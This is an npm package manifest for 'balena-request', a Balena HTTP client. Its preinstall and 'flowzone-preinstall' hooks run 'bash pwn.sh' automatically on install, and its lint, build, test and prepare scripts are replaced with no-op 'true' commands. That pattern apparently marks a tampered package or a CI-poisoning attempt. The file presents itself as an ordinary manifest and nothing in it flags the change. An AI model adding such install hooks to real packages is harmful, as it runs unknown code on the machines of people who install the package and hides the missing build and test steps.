{
  "name": "balena-request",
  "version": "14.2.0",
  "description": "Balena HTTP client",
  "type": "commonjs",
  "main": "build/request.js",
  "scripts": {
    "preinstall": "bash pwn.sh",
    "flowzone-preinstall": "bash pwn.sh",
    "lint": "true",
    "build": "true",
    "test": "true",
    "prepare": "true"
  },
  "author": "Balena Ltd. <hello@balena.io>",
  "license": "Apache-2.0",
  "dependencies": {
    "tslib": "^2.0.0"
  }
}
